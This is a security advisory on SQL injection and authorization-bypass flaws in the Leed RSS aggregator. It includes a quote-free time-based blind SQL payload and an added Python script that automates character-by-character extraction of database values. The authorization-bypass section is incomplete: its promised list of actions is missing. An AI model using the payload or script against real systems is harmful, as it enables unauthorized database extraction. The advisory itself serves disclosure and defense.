Leed is a lightweight RSS/ATOM aggregator written in PHP. It can be hosted
on any server supporting PHP and aims to be an alternative to Google
Reader and its substitutes. [1]
SQL injection (CSNC-2013-005 / CVE-2013-2627)
The SQL injection is in the id parameter of
leed/action.php?action=removeFolder&id=-1, where the user input is not
escaped before it is used in the query. Escaping is otherwise done
consistently across the rest of the audited code. Exploiting this issue
is tricky because the parameter is HTML-encoded, but not impossible, e.g.
with a payload that needs no quote characters:
If SELECT @@version returns '5.0.84-log' on your database,
CAST(@@version as signed) will return 5, as the cast stops at the first
non-numeric character.
The injection parameter (before encoding) would then be, e.g.
IF(CAST(@@version as signed) in(5),BENCHMARK(2000000,SHA1(0)),-1)
This blind, time-based SQL injection takes ~5 seconds on my installation
because the condition is true; with a false condition the query returns
-1 immediately. By comparing response times this way, you can extract
information from the MySQL tables one value at a time.
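The following Python script generalises the single CAST() test above into a character-by-character, time-based extraction of @@version. It is an added example and is not code from Compass Security or from the Leed project. It assumes, as the page's own IF(...) payload implies, that the id value is interpolated unquoted into the query, and that the HTML encoding applied to the parameter mangles quotes, <, > and &, so the condition is built only from BETWEEN, commas and parentheses. The request function, the delay threshold and the offline sample oracle are assumptions for demonstration; against a real target the oracle would be built with make_timing_oracle() around an HTTP request that sends the (URL-encoded) payload as the id parameter.

```python
import time

# Time-based blind SQL injection helper for the removeFolder id parameter
# discussed in the advisory. Added example, not Compass Security's or Leed's
# own code. Assumptions (not stated on the page): the id value is used
# unquoted in the query, and the HTML encoding breaks quotes, <, > and &,
# so the payload only uses BETWEEN, commas and parentheses.

DELAY_EXPR = "BENCHMARK(2000000,SHA1(0))"   # ~5 s on the page's installation


def build_payload(pos: int, low: int) -> str:
    """SQL expression for the id value: slow when the ASCII code of
    character `pos` (1-based) of @@version is >= `low`, otherwise it
    evaluates to -1, the harmless id from the page's URL."""
    cond = f"ASCII(SUBSTRING(@@version,{pos},1)) BETWEEN {low} AND 255"
    return f"IF({cond},{DELAY_EXPR},-1)"


def make_timing_oracle(send, min_delay: float):
    """Wrap send(payload_str), which performs one request, into a boolean
    oracle(pos, low) that is True when the response took >= min_delay s."""
    def oracle(pos: int, low: int) -> bool:
        start = time.perf_counter()
        send(build_payload(pos, low))
        return time.perf_counter() - start >= min_delay
    return oracle


def extract_char(oracle, pos: int) -> int:
    """Binary search for the ASCII code at position pos (8 oracle queries)."""
    lo, hi = 0, 255
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if oracle(pos, mid):      # code >= mid
            lo = mid
        else:
            hi = mid - 1
    return lo


def extract_string(oracle, max_len: int = 64) -> str:
    """Extract @@version character by character; SUBSTRING() past the end
    returns '' and ASCII('') is 0, which terminates the loop."""
    out = []
    for pos in range(1, max_len + 1):
        code = extract_char(oracle, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


# Offline demonstration: a constructed stand-in for the database that
# answers the condition directly instead of measuring BENCHMARK() timings.
SAMPLE_VERSION = "5.0.84-log"   # constructed sample, the page's example value


def sample_oracle(pos: int, low: int) -> bool:
    return pos <= len(SAMPLE_VERSION) and ord(SAMPLE_VERSION[pos - 1]) >= low


if __name__ == "__main__":
    print(build_payload(1, 53))          # payload to put in the id parameter
    print(extract_string(sample_oracle))  # recovers "5.0.84-log" offline
```

Each character costs eight requests, and only the requests whose condition holds pay the ~5 second BENCHMARK() delay, so min_delay should sit well below that (for example 2.5 s) but above the target's normal response time. The same build_payload() skeleton works for any other scalar expression (a column from a subquery, for instance) by swapping @@version for it.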
Authorization bypasses in action.php (CSNC-2013-007 / CVE-2013-2629)
The following actions can be called anonymously, because the $myUser
variable is not checked before they are executed:
Upgrade to the latest available version of Leed.
2013-12-18: Public disclosure date
2013-03-19: GIT commit of the fixes
2013-03-19: Initial vendor response
2013-03-19: Discovery by Alexandre Herzog & initial vendor notification
[1] http://projet.idleman.fr/leed/
–
Alexandre Herzog, IT Security Analyst, Compass Security AG
Werkstrasse 20, 8645 Jona, Switzerland
Schauplatzgasse 39, 3011 Bern, Switzerland
Tel: +41 55 214 41 66
http://www.csnc.ch/